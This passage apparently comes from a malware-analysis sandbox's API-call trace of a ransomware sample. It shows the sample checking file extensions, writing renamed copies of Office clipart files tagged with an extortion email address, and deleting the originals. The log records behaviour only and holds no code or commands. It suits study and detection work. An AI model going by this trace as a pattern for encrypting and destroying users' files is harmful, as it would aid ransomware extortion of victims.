(lpString1=".pdf", lpString2=".WMF") returned -1 [0064.075] lstrlenW (lpString=".xls") returned 4 [0064.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.075] lstrlenW (lpString=".xlsx") returned 5 [0064.075] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.075] lstrlenW (lpString=".ppt") returned 4 [0064.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0064.075] lstrlenW (lpString=".zip") returned 4 [0064.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.076] lstrlenW (lpString=".rar") returned 4 [0064.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.076] lstrlenW (lpString=".bz2") returned 4 [0064.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.076] lstrlenW (lpString=".7z") returned 3 [0064.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0064.076] lstrlenW (lpString=".dbf") returned 4 [0064.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0064.076] lstrlenW (lpString=".1cd") returned 4 [0064.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0064.076] lstrlenW (lpString=".jpg") returned 4 [0064.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.097] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.097] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0064.099] GetLastError () returned 0x0 [0064.099] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1370, lpOverlapped=0x0) returned 1 [0064.104] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1380, lpOverlapped=0x0) returned 1 [0064.105] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.105] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.105] SetEndOfFile (hFile=0x358) returned 1 [0064.106] CloseHandle (hObject=0x358) returned 1 [0064.106] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.106] SetEndOfFile (hFile=0x350) returned 1 [0064.107] CloseHandle (hObject=0x350) returned 1 [0064.107] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.108] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf")) returned 1 [0064.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0064.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0064.108] lstrlenW (lpString=".doc") returned 4 [0064.108] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.108] lstrlenW (lpString=".docx") returned 5 [0064.108] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.108] lstrlenW (lpString=".pdf") returned 4 [0064.108] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.108] lstrlenW (lpString=".xls") returned 4 [0064.108] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.108] lstrlenW (lpString=".xlsx") returned 5 [0064.108] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.108] lstrlenW (lpString=".ppt") returned 4 [0064.108] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0064.108] lstrlenW (lpString=".zip") returned 4 [0064.108] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.108] lstrlenW (lpString=".rar") returned 4 [0064.108] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.108] lstrlenW (lpString=".bz2") returned 4 [0064.109] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.109] lstrlenW (lpString=".7z") returned 3 [0064.109] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0064.109] lstrlenW (lpString=".dbf") returned 4 [0064.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0064.109] lstrlenW (lpString=".1cd") returned 4 [0064.109] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0064.109] lstrlenW (lpString=".jpg") returned 4 [0064.109] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.109] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.109] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0064.109] GetLastError () returned 0x0 [0064.110] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x634, lpOverlapped=0x0) returned 1 [0064.111] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x640, lpOverlapped=0x0) returned 1 [0064.112] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.112] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.112] SetEndOfFile (hFile=0x358) returned 1 [0064.112] CloseHandle (hObject=0x358) returned 1 [0064.113] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.113] SetEndOfFile (hFile=0x350) returned 1 [0064.113] CloseHandle (hObject=0x350) returned 1 [0064.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00224_.wmf")) returned 1 [0064.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0064.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0064.114] lstrlenW (lpString=".doc") returned 4 [0064.114] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.114] lstrlenW (lpString=".docx") returned 5 [0064.114] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.114] lstrlenW (lpString=".pdf") returned 4 [0064.114] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.114] lstrlenW (lpString=".xls") returned 4 [0064.114] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.114] lstrlenW (lpString=".xlsx") returned 5 [0064.114] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.114] lstrlenW (lpString=".ppt") returned 4 [0064.114] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0064.114] lstrlenW (lpString=".zip") returned 4 [0064.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.114] lstrlenW (lpString=".rar") returned 4 [0064.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.114] lstrlenW (lpString=".bz2") returned 4 [0064.114] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.115] lstrlenW (lpString=".7z") returned 3 [0064.115] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0064.115] lstrlenW (lpString=".dbf") returned 4 [0064.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0064.115] lstrlenW (lpString=".1cd") returned 4 [0064.115] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 68 [0064.115] lstrlenW (lpString=".jpg") returned 4 [0064.115] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.120] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.120] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.123] GetLastError () returned 0x0 [0064.123] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4bc, lpOverlapped=0x0) returned 1 [0064.126] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4c0, lpOverlapped=0x0) returned 1 [0064.127] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.127] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.127] SetEndOfFile (hFile=0x384) returned 1 [0064.129] CloseHandle (hObject=0x384) returned 1 [0064.131] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.131] SetEndOfFile (hFile=0x2c8) returned 1 [0064.137] CloseHandle (hObject=0x2c8) returned 1 [0064.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00438_.wmf")) returned 1 [0064.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0064.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0064.141] lstrlenW (lpString=".doc") returned 4 [0064.141] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.141] lstrlenW (lpString=".docx") returned 5 [0064.141] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.141] lstrlenW (lpString=".pdf") returned 4 [0064.141] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.141] lstrlenW (lpString=".xls") returned 4 [0064.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.141] lstrlenW (lpString=".xlsx") returned 5 [0064.141] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.141] lstrlenW (lpString=".ppt") returned 4 [0064.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0064.141] lstrlenW (lpString=".zip") returned 4 [0064.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.141] lstrlenW (lpString=".rar") returned 4 [0064.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.142] lstrlenW (lpString=".bz2") returned 4 [0064.142] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.142] lstrlenW (lpString=".7z") returned 3 [0064.142] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0064.142] lstrlenW (lpString=".dbf") returned 4 [0064.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0064.142] lstrlenW (lpString=".1cd") returned 4 [0064.142] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 68 [0064.142] lstrlenW (lpString=".jpg") returned 4 [0064.142] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.143] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.143] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.146] GetLastError () returned 0x0 [0064.146] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x9b8, lpOverlapped=0x0) returned 1 [0064.165] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x9c0, lpOverlapped=0x0) returned 1 [0064.167] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.168] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.168] SetEndOfFile (hFile=0x384) returned 1 [0064.168] CloseHandle (hObject=0x384) returned 1 [0064.168] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.168] SetEndOfFile (hFile=0x350) returned 1 [0064.169] CloseHandle (hObject=0x350) returned 1 [0064.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00442_.wmf")) returned 1 [0064.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0064.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0064.172] lstrlenW (lpString=".doc") returned 4 [0064.172] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.172] lstrlenW (lpString=".docx") returned 5 [0064.172] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.172] lstrlenW (lpString=".pdf") returned 4 [0064.172] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.172] lstrlenW (lpString=".xls") returned 4 [0064.172] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.172] lstrlenW (lpString=".xlsx") returned 5 [0064.172] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.172] lstrlenW (lpString=".ppt") returned 4 [0064.172] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0064.172] lstrlenW (lpString=".zip") returned 4 [0064.172] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.172] lstrlenW (lpString=".rar") returned 4 [0064.172] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.172] lstrlenW (lpString=".bz2") returned 4 [0064.172] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.172] lstrlenW (lpString=".7z") returned 3 [0064.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0064.173] lstrlenW (lpString=".dbf") returned 4 [0064.173] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0064.173] lstrlenW (lpString=".1cd") returned 4 [0064.173] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 68 [0064.173] lstrlenW (lpString=".jpg") returned 4 [0064.173] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.178] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.178] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0064.180] GetLastError () returned 0x0 [0064.180] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x984, lpOverlapped=0x0) returned 1 [0064.187] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x990, lpOverlapped=0x0) returned 1 [0064.188] ReadFile (in: hFile=0x384, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.188] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.188] SetEndOfFile (hFile=0x2c8) returned 1 [0064.191] CloseHandle (hObject=0x2c8) returned 1 [0064.192] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.192] SetEndOfFile (hFile=0x384) returned 1 [0064.195] CloseHandle (hObject=0x384) returned 1 [0064.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.195] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf")) returned 1 [0064.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0064.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0064.196] lstrlenW (lpString=".doc") returned 4 [0064.196] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.196] lstrlenW (lpString=".docx") returned 5 [0064.196] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.196] lstrlenW (lpString=".pdf") returned 4 [0064.196] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.196] lstrlenW (lpString=".xls") returned 4 [0064.196] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.196] lstrlenW (lpString=".xlsx") returned 5 [0064.196] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.196] lstrlenW (lpString=".ppt") returned 4 [0064.196] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0064.196] lstrlenW (lpString=".zip") returned 4 [0064.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.196] lstrlenW (lpString=".rar") returned 4 [0064.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.196] lstrlenW (lpString=".bz2") returned 4 [0064.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.196] lstrlenW (lpString=".7z") returned 3 [0064.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0064.196] lstrlenW (lpString=".dbf") returned 4 [0064.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0064.197] lstrlenW (lpString=".1cd") returned 4 [0064.197] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 68 [0064.197] lstrlenW (lpString=".jpg") returned 4 [0064.197] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.198] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.198] SetFilePointerEx (in: 